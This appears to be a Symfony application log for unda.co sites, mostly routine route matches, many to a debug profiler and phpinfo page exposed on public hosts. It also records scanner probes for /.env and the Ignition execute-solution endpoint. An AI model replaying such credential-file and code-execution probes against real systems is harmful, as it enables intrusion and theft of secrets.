[2025-12-18 14:07:36] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 14:12:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 14:12:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 14:15:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5","method":"GET"} []
[2025-12-18 14:15:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 14:16:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/Java.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/Java.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 14:16:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /+CSCOL+/a1.jar"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /+CSCOL+/a1.jar\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 14:17:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6eb557","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/6eb557?panel=cache","method":"GET"} []
[2025-12-18 14:17:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 14:23:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=cache","method":"GET"} []
[2025-12-18 14:23:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 14:30:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 14:32:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7300e2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/7300e2?panel=cache","method":"GET"} []
[2025-12-18 14:32:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 14:38:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=logger","method":"GET"} []
[2025-12-18 14:38:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-18 14:40:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4ceed5","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4ceed5?panel=config","method":"GET"} []
[2025-12-18 14:40:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 14:47:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"af2b6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/af2b6f?panel=router","method":"GET"} []
[2025-12-18 14:47:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 14:48:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=twig","method":"GET"} []
[2025-12-18 14:48:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 14:51:40] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 14:51:42] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 14:51:53] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"647a97","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/647a97","method":"GET"} []
[2025-12-18 14:52:24] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 14:54:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4daf2f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4daf2f?panel=time","method":"GET"} []
[2025-12-18 14:54:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 14:56:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=time","method":"GET"} []
[2025-12-18 14:56:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 15:05:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=security","method":"GET"} []
[2025-12-18 15:05:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 15:13:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=request","method":"GET"} []
[2025-12-18 15:13:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 15:15:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 15:21:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"016869","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/016869?panel=security","method":"GET"} []
[2025-12-18 15:21:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 15:21:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbdc7b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbdc7b?panel=form","method":"GET"} []
[2025-12-18 15:21:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=form","method":"GET"} []
[2025-12-18 15:23:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=db","method":"GET"} []
[2025-12-18 15:23:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 15:25:39] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 15:25:48] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"HEAD"} []
[2025-12-18 15:25:48] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-18 15:25:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 15:25:50] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-18 15:25:51] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
[2025-12-18 15:25:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 15:25:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 15:31:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 15:35:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=config","method":"GET"} []
[2025-12-18 15:35:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 15:41:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"daff8d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/daff8d?panel=router","method":"GET"} []
[2025-12-18 15:41:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
[2025-12-18 15:42:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"04e5af","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/04e5af","method":"GET"} []
[2025-12-18 15:42:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 15:43:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43?panel=cache","method":"GET"} []
[2025-12-18 15:43:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 15:51:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"HEAD"} []
[2025-12-18 15:51:02] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 15:51:02] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 15:51:02] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 15:51:02] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 15:51:02] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 15:51:02] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 15:51:03] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-18 15:51:03] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 15:51:03] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 15:51:03] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 15:51:03] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 15:51:03] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 15:51:03] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 15:51:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 15:51:04] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
[2025-12-18 15:51:04] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 15:51:04] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 15:51:04] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 15:51:04] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 15:51:04] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 15:51:04] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 15:51:05] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
[2025-12-18 15:51:05] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-18 15:51:05] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 15:51:05] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-18 15:51:05] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
[2025-12-18 15:51:05] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
[2025-12-18 15:51:05] security.DEBUG: Calling Authentication entry point. [] []
[2025-12-18 15:51:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 15:51:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /public/_ignition/execute-solution"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /public/_ignition/execute-solution\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 15:52:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e05b43","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e05b43","method":"GET"} []
[2025-12-18 15:52:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 16:01:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=twig","method":"GET"} []
[2025-12-18 16:01:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 16:09:27] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
[2025-12-18 16:09:58] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"a922fd","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/a922fd","method":"GET"} []
[2025-12-18 16:11:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=time","method":"GET"} []
[2025-12-18 16:11:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 16:18:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 16:19:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=security","method":"GET"} []
[2025-12-18 16:19:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 16:20:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 16:25:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 16:26:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8098e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8098e0?panel=dump","method":"GET"} []
[2025-12-18 16:26:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-18 16:28:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3e8aaa","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/3e8aaa?panel=request","method":"GET"} []
[2025-12-18 16:28:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 16:28:32] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://www.unda.co/_profiler/phpinfo","method":"GET"} []
[2025-12-18 16:29:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
